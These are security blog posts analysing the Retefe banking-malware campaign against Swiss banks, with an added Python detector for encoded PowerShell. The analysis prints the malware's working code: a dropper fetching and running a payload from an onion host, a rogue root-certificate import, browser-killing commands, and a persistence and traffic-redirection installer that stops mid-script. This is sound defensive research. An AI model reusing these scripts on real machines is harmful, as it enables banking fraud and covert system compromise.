
Friday, February 24, 2017

Hunting Retefe with Splunk - some interesting points

While I was creating some Splunk use cases to detect malware (together with Sysmon), I did some tests with the Retefe malware, which I have written about quite a bit in this blog.
There are a couple of things I found interesting to share.

The initial infection vector is malspam with a fake bill in a DOCX file that contains malicious code. However, this time the malicious code is PowerShell instead of JS (more info in http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html).


This can be spotted straightforwardly in Splunk:

powershell -EncodedCommand "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"

The decoded command, which acts as a dropper, is the following:

$F=$env:Temp+'\RBXr1lk9P.js';
(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='+(New-Object System.Net.WebClient).DownloadString('http://api.ipify.org/')+'&id='+((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F);

Basically, it requests a file (the payload) hosted on a Tor hidden service, reached through the onion.to Tor2web gateway: https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=

To request the file, the victim's public IP and the volume serial number of the logical disk are sent as parameters. To do so, two things happen:

1) a request to http://api.ipify.org/ to get the public IP of the victim
2) the command ((wmic path win32_logicaldisk get volumeserialnumber)[2]) to extract the volume serial number of the logical disk.
If the IP is not from certain countries or the serial number is empty, the downloaded payload is empty as well, hence nothing happens. Note that the array index [2] does not always work: it selects one line of the wmic output, and on some systems that output has a different number of lines, so the index needs to be different. For example, this command works in some virtual machines (just put an IP from Switzerland in w.x.y.z):


$F=$env:Temp+'\RBXr1lk9P.js';(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=w.x.y.z&id='+((wmic path win32_logicaldisk get volumeserialnumber)[4]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F)

Clearly, they are using the volume serial number for tracking purposes.
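As an added example (not part of the original post), here is a small Python hunt that does offline what the Splunk search above does: it pulls the -EncodedCommand argument out of Sysmon-style process-creation events, decodes it (base64 over UTF-16LE, which is why a plain base64 decode of these blobs yields garbage), and scores the decoded text against the indicators of this dropper: the onion.to Tor2web gateway, the api.ipify.org lookup, the wmic volume serial fingerprint, the WebClient download and the ShellExecute from %TEMP%. The event lines and the encoded command are constructed for the example, and the pipe-separated Image/CommandLine/ParentImage layout is an assumption, not a real Sysmon export.

```python
import base64
import re

# Constructed dropper command, modelled on the decoded one above (the original blob is not reproduced).
CONSTRUCTED_DROPPER = (
    "$F=$env:Temp+'\\RBXr1lk9P.js';"
    "(New-Object System.Net.WebClient).DownloadFile("
    "'https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='"
    "+(New-Object System.Net.WebClient).DownloadString('http://api.ipify.org/')"
    "+'&id='+((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F);"
    "(New-Object -com Shell.Application).ShellExecute($F);"
)


def encode_powershell(cmd):
    """What powershell.exe expects after -EncodedCommand: base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed Sysmon-style process-creation events; the pipe-separated field layout is assumed.
SAMPLE_EVENTS = [
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine: powershell -EncodedCommand " + encode_powershell(CONSTRUCTED_DROPPER) +
    "|ParentImage: C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine: powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"
    "|ParentImage: C:\\Windows\\System32\\svchost.exe",
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine: powershell -enc " + encode_powershell("Get-Process | Out-File C:\\temp\\p.txt") +
    "|ParentImage: C:\\Windows\\explorer.exe",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are the usual ones.
ENC_RE = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]+)', re.IGNORECASE)

# Indicators taken from the dropper above; each is a separate signal so the hit list explains the alert.
INDICATORS = {
    "tor2web_gateway": re.compile(r"\.onion\.to\b", re.I),
    "public_ip_lookup": re.compile(r"api\.ipify\.org", re.I),
    "volume_serial_fingerprint": re.compile(r"wmic\s+path\s+win32_logicaldisk\s+get\s+volumeserialnumber", re.I),
    "webclient_download": re.compile(r"WebClient\)\.Download(?:File|String)", re.I),
    "shellexecute_from_temp": re.compile(r"\$env:Temp.*ShellExecute", re.I | re.S),
}
OFFICE_PARENT_RE = re.compile(r"\\(?:WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)


def parse_event(line):
    """Split 'Key: value|Key: value' into a dict (assumed export layout)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value
    return fields


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if there is none or it does not decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # bad padding / odd byte count
        return None


def analyze_event(line):
    """Decode if needed, then score the command text against the dropper indicators."""
    fields = parse_event(line)
    cmdline = fields.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    office_parent = bool(OFFICE_PARENT_RE.search(fields.get("ParentImage", "")))
    # Two dropper indicators on their own, or an Office parent spawning encoded PowerShell, is enough.
    suspicious = len(hits) >= 2 or (office_parent and (decoded is not None or bool(hits)))
    return {"decoded": decoded, "indicators": hits, "office_parent": office_parent, "suspicious": suspicious}


def hunt(lines):
    """Return the analyses of the events worth looking at."""
    return [a for a in map(analyze_event, lines) if a["suspicious"]]


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["indicators"], (alert["decoded"] or "")[:60])
```

Only the first constructed event is flagged: the other two are a plain script run from a service host and a harmless encoded one-liner from Explorer, which is the kind of noise a rule on "-enc" alone would drown in. The same decode step is what a scripted lookup in Splunk would do before the indicator search.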

Once the script is pulled, the whole execution happens: some JS code is executed, some additional tools are decompressed and executed (Tor and Proxifier), the browser processes are killed, etc.



However, a couple of new 'features' have been introduced since my last posts:
http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html
http://blog.angelalonso.es/2016/10/malicious-email-campaign-mimicking.html

First of all, the way the Proxifier tool is launched has changed: the window is now hidden. This is done with the following PowerShell command, which imports user32!ShowWindow via Add-Type, starts Proxifier and loops until ShowWindow(handle, 0) (SW_HIDE) succeeds on its main window:



"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$t='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;saps -FilePath \"Proxifier\";while(![n.w]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName(\"proxifier\")|gps).MainWindowHandle,0)){}"

Second, Proxifier is configured not to show its icon in the Windows system tray.



After that, the victim's traffic towards the banks is redirected through Tor. In order to steal the SMS TAN token, a malicious APK needs to be installed on the victim's phone; here there are some changes as well:




Now the APK resides on a domain with a valid SSL certificate and can be downloaded over HTTPS. Before, this was not the case and the traffic was only HTTP.

Note that the certificate was issued a few days ago and expires in 2 months.




Moreover, if the visitor is not a real victim, the download link does not serve the malicious APK but the real 'Signal Private Messenger' tool, hence the phone doesn't get infected. Some examples of the URL for different banks:

https://mobile-sicherheitapp.com/ZKB-Security-v19-02.apk
https://mobile-sicherheitapp.com/CreditSuisse-Security_v1902.apk

https://mobile-sicherheitapp.com/Raiffeisenc-Security-v_19-02.apk





Wednesday, November 16, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (III)

Following the last two posts, this is a quick update: I have detected that some new Swiss banks have been added to the list of Retefe targets (since I last checked some weeks ago).

These are:

 *valiant.ch;
 *wir.ch;
 *bankthalwil.ch;
 *piguetgalland.ch;
 *triba.ch;
 *inlinea.ch;
 *bernerlandbank.ch;
 *bancasempione.ch;
 *bsibank.com;
 *corneronline.ch;
 *vermoegenszentrum.ch;
 *gobanking.ch;
 *slbucheggberg.ch;
 *slfrutigen.ch;
 *hypobank.ch;
 *regiobank.ch;
 *rbm.ch;
 *hbl.ch;
 *ersparniskasse.ch;
 *ekr.ch;
 *sparkasse-dielsdorf.ch;
 *eki.ch;
 *bankgantrisch.ch;
 *bbobank.ch;
 *alpharheintalbank.ch;
 *aekbank.ch;
 *acrevis.ch




Also, the cyber criminals have changed the way the malicious payload is weaponized through the malicious 'docx'. Instead of using a JS script, they are now using an EXE executable:





Monday, October 17, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (II)

A few days ago, when I took a look at the latest Retefe campaign affecting Swiss financial institutions, I did not have time to take a deeper look at the malicious JS embedded in the .docx file. So in this post I'll explain a bit about it. In particular, I'm interested in understanding how the Proxifier tool is set up with a custom profile to forward the traffic through Tor. This tool is something the cyber criminals have introduced recently; previously they used a proxy PAC file, set up in the registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL".

The latest analysis of Retefe from Avast shows exactly the behaviour described above.

Retefe is not just affecting Swiss banks, but also banks in other countries, like the UK. So it might be that the custom proxy profile is hardcoded into the malicious JS, or that the file is downloaded dynamically. So let's take a look at it.

(I have uploaded the malicious JS payload to VT.)

The JS is obfuscated, so I'm using Visual Studio to do some debugging.

The first interesting thing I see are the Tor URLs defined: bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion.




Also, there is the fake Comodo CA certificate, which is used to avoid the browser SSL warnings. This is base64 encoded.




There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.










Then there is a command to import the certificate
"certutil -addstore -f -user \"ROOT\" \""

and some base64 encoded commands to kill the running browsers:




"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe

"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe

So at this point the malicious certificate has been imported and all the browsers, after being killed, have the malicious COMODO CA certificate in their CA chain.

Debugging deeper, at the end a temporary file is created which contains the PowerShell script with the interesting stuff.




This is the code



function Unzip
{
param([string]$zipfile, [string]$destination);
$7zaExe = Join-Path $env:Temp '7za.exe';
if (-NOT (Test-Path $7zaExe)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe);
}
Catch{}
}
if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){
Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0);
$ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
$td=$ts.NewTask();
$td.RegistrationInfo.Description = 'Does something';
$td.Settings.DisallowStartIfOnBatteries = $False;
$td.Settings.StopIfGoingOnBatteries = $False;
$td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
$LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
$LogonTrigger.StartBoundary=[System.DateTime]::Now;
$LogonTrigger.UserId=$env:username;
$LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
$td.Triggers.Add($LogonTrigger);
if($restart -eq 1){
$TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
$TimeTrigger.StartBoundary=[System.DateTime]::Now;
$TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20);
$TimeTrigger.Repetition.StopAtDurationEnd=$False;
$td.Triggers.Add($TimeTrigger);
}
$ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params);
$td.Actions.Add($ExecAction);
$task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
$task.Run();
}
function InstallTP{
$File=$env:Temp+'\ts.zip';
$Dest=$env:Temp+'\ts';
(New-Object System.Net.WebClient).DownloadFile('http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031',$File);
if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null;
Unzip $File $Dest;
rm -Force $File;
$TSAssembly=$Dest+'\v2.0\Microsoft.Win32.TaskScheduler.dll';
$loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
$TFile=$env:Temp+'\t.zip';
$DestTP=$env:APPDATA+'\TP';
(New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip',$TFile);
if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null;
Unzip $TFile $DestTP;
rm -Force $TFile;
$tor=$DestTP+'\Tor\tor.exe';
$tor=$tor.Replace('\','/');
$tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd;
$PFile=$env:Temp+'\p1.zip';
$wc=new-object net.webclient;
$purl='http://proxifier.com/distr/ProxifierPE.zip';
$wc.DownloadFile($purl,$PFile);
Unzip $PFile $DestTP;
$p_old=$DestTP+'\Proxifier PE\';
rm -Force $PFile;
Rename-Item -path $p_old -newName 'p';
$p_fold=$DestTP+'\p\';
$p=$DestTP+'\p\Proxifier.exe';
$settings_file=$p_fold+'Settings.ini';
Base64ToFile $settings_file 'W1NldHRpbmdzXQ0KRGVmYXVsdE5ldFByb2ZpbGU9MTcxMTg3Njg4NQ0KTG9nTGV2ZWxTY3JlZW49Mg0KTG9nTGV2ZWxGaWxlPTANCkxvZ1BhdGg9DQpTeXNUcmF5SWNvbj0xDQpTeXNUcmF5SWNvblNob3dUcmFmZmljPTANClNob3dUcmFmZmljVHlwZT0wDQpUcmFmZmljUmVmcmVzaFNwZWVkPTENCkFjdGl2ZVByb2ZpbGU9RGVmYXVsdA0KUHJvZmlsZUF1dG9VcGRhdGU9MA0KUHJvZmlsZVVwZGF0ZVVybD0NClByb2ZpbGVVcGRhdGVVcmxUb0ZvbGRlcj0xDQpQcm9maWxlVXBkYXRlS2VlcExvZ2lucz0wDQpVcGRhdGVDaGVjaz0wDQpbV29ya3NwYWNlXQ0KQXBwbGljYXRpb25Mb29rPTIxNA0KUnVsZURsZ1dpZHRoPTczMg0KUnVsZURsZ0hlaWdodD00MzYNCltEZWZhdWx0XENvbnRyb2xCYXJWZXJzaW9uXQ0KTWFqb3I9OQ0KTWlub3I9MA0KW0RlZmF1bHRcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1BQUFBQUFBQUFBQUENCltEZWZhdWx0XENvbW1hbmRNYW5hZ2VyXQ0KQ29tbWFuZHNXaXRob3V0SW1hZ2VzPUFBQUENCk1lbnVVc2VySW1hZ2VzPUFBQUENCltEZWZhdWx0XENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW0RlZmF1bHRcUGFuZS01OTM5M10NCklEPTANClJlY3RSZWNlbnRGbG9hdD1LQUFBQUFBQUtBQUFBQUFBT0dBQUFBQUFPR0FBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1BQUFBQUFBQUdKQkFBQUFBRUVEQUFBQUFKS0JBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9NDA5Ng0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW0RlZmF1bHRcQmFzZVBhbmUtNTkzOTNdDQpJc1Zpc2libGU9MQ0KW0RlZmF1bHRcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBQ0FCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLS0xXQ0KSXNWaXNpYmxlPTENCltEZWZhdWx0XFBhbmUtMzEwXQ0KSUQ9MzEwDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTgxOTINClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2V
QYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbRGVmYXVsdFxQYW5lLTEwMjJdDQpJRD0xMDIyDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTEwMjJdDQpJc1Zpc2libGU9MA0KW0RlZmF1bHRcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUlQQUFBQUFBSUtCQUFBQUFBTUJBQUFBQUFIQ0FBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQUlPQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbRGVmYXVsdFxCYXNlUGFuZS0xMDIzXQ0KSXNWaXNpYmxlPTANCltEZWZhdWx0XERvY2tpbmdNYW5hZ2VyLTEyOF0NCkRvY2tpbmdQYW5lQW5kUGFuZURpdmlkZXJzPUFBQUFBQUFBQ0FBQUFBQUFBQUFBQUFBQUFBQUNBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQQUFBQUFBQUFDQUJBQUFBQUVFREFBQUFBR0FCQUFBQUFBQUFBQUFBQUJBQUFBQUFCRUFBQUFBQUFCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFQUFBQUFBQUERBQUFBQUFBR0RCQUFBQUFPUERBQUFBQVBQREFBQUFBUFBQUENBQUFMQUFBREVFRkJHQ0dDR0ZHRUdBRkJHT0dGR0FBQUNBQUFBQkFBQUFBQUFJUEFBQUFBQUlLQkFBQUFBQU1CQUFBQUFBSENBQUFBQUFBQUFBQUFBT0NBQUFBQUFFRURBQUFBQUNBQkFBQUFBQUFBQUFBQUFBRUVCQUFHRkRBQUFBQUFBUFBPUFBQTEFERUFBUEdBQU9HQUFPR0FBRkdBQURHQUFFSEFBSkdBQVBHQUFPR0FBREhBQUJBQUFBQUFBR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBQUE9QUFBIQUVGQUFDSEFBQkdBQUdHQUFHR0FBSkdBQURHQUFCQUFBQUFBQU9QREFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQS0FERkFBRUhBQUJHQUFFSEFBSkdBQURIQUFFSEFBSkdBQURHQUFESEFBQkFBQUFBQUFQUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KW1N0YXR1c10NCkZpcnN0UnVuPTANClN5c1RyeUljb25NZXNzYWdlU2hvd249MQ0KW1dvcmtzcGFjZVxDb250cm9sQmFyVmVyc2lvbl0NCk1ham9yPTkNCk1pbm9yPTANCltXb3Jrc3BhY2VcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnV
TaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1HRkFBQUFBQUVCQUFBRUJPQUFBQUJBQUFBQUFBTkFFQUFBQUFDQUFBQUFBQVBIQUlBQUFBQkFBQUFBQUFFQUJPQUFBQUJBQUFBQUFBT0JBSUFBQUFHQkFBQUFBQU9FQUlBQUFBREFBQUFBQUFQRkFJQUFBQUNBQUFBQUFBTEVBSUFBQUFCQUFBQUFBQU1BRUFBQUFBQkFBQUFBQUFPSEFJQUFBQUJBQUFBQUFBREFCT0FBQUFDQUFBQUFBQU5CQUlBQUFBQUJBQUFBQUFQREFJQUFBQUxBQUFBQUFBQUFFQUFBQUFDQUFBQUFBQUNDQk9BQUFBQ0FBQUFBQUFESUFJQUFBQURBQUFBQUFBTURBSUFBQUFFQUFBQUFBQUtFQUlBQUFBSUFBQUFBQUFNQkFJQUFBQUNBQUFBQUFBT0RBSUFBQUFCQUFBQUFBQQ0KW1dvcmtzcGFjZVxDb21tYW5kTWFuYWdlcl0NCkNvbW1hbmRzV2l0aG91dEltYWdlcz1BQUFBDQpNZW51VXNlckltYWdlcz1BQUFBDQpbV29ya3NwYWNlXENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW1dvcmtzcGFjZVxQYW5lLTU5MzkzXQ0KSUQ9MA0KUmVjdFJlY2VudEZsb2F0PUtBQUFBQUFBS0FBQUFBQUFPR0FBQUFBQU9HQUFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUFBQUFBQUFBR0pCQUFBQUFFRURBQUFBQUpLQkFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTU5MzkzXQ0KSXNWaXNpYmxlPTENCltXb3Jrc3BhY2VcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBSEJCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltXb3Jrc3BhY2VcQmFzZVBhbmUtLTFdDQpJc1Zpc2libGU9MQ0KW1dvcmtzcGFjZVxQYW5lLTMxMF0NCklEPTMxMA0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbV29ya3NwYWNlXFBhbmUtMTAyMl0NCklEPTEwMjINClJlY3RSZWNlbnRGbG9hdD1DQUJBQUFBQUlCQkFBQUFBS01CQUFBQUFBT0JBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1FQUFBQUFBQUdFQUFBQUFBQUVEQUFBQUFOUEFBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9ODE5Mg0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR
0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW1dvcmtzcGFjZVxCYXNlUGFuZS0xMDIyXQ0KSXNWaXNpYmxlPTANCltXb3Jrc3BhY2VcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTEwMjNdDQpJc1Zpc2libGU9MA0KW1dvcmtzcGFjZVxEb2NraW5nTWFuYWdlci0xMjhdDQpEb2NraW5nUGFuZUFuZFBhbmVEaXZpZGVycz1BQUFBQUFBQUNBQUFBQUFBQUFBQUFBQUFBQUFDQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBSEJCQUFBQUFFRURBQUFBQUxCQkFBQUFBQUFBQUFBQUFCQUFBQUFBQkVBQUFBQUFBQkFBQUFBQUFHSk9QUFBQUElGQUFBQUFBUFBQUFBQUFBEQUFBQUFBQUdEQkFBQUFBT1BEQUFBQUFQUERBQUFBQVBQUFBDQUFBTEFBQURFRUZCR0NHQ0dGR0VHQUZCR09HRkdBQUFDQUFBQUJBQUFBQUFBSVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUFBQUFBQUFBQU9DQUFBQUFBRUVEQUFBQUFIQkJBQUFBQUFBQUFBQUFBQUVFQkFBR0ZEQUFBQUFBQVBQT1BQUExBREVBQVBHQUFPR0FBT0dBQUZHQUFER0FBRUhBQUpHQUFQR0FBT0dBQURIQUFCQUFBQUFBQUdEQkFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQSEFFRkFBQ0hBQUJHQUFHR0FBR0dBQUpHQUFER0FBQkFBQUFBQUFPUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUFBQT1BQUEtBREZBQUVIQUFCR0FBRUhBQUpHQUFESEFBRUhBQUpHQUFER0FBREhBQUJBQUFBQUFBUFBEQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCltXb3Jrc3BhY2VcV2luZG93UGxhY2VtZW50XQ0KTWFpbldpbmRvd1JlY3Q9QVBBQUFBQUFLSUJBQUFBQUVFRUFBQUFBSkZEQUFBQUENCkZsYWdzPTANClNob3dDbWQ9MQ0KW0xpY2Vuc2VdDQpPd25lcj0yVENLWC1UWVFITC1ORk4zMy0zWUVEWS1RVzY1RA0KS2V5PTJUQ0tYLVRZUUhMLU5GTjMzLTNZRURZLVFXNjVEDQo=';
$p_prof=$p_fold+'Profiles\';
md $p_prof | Out-Null;
$def_file=$p_prof+'Default.ppx';
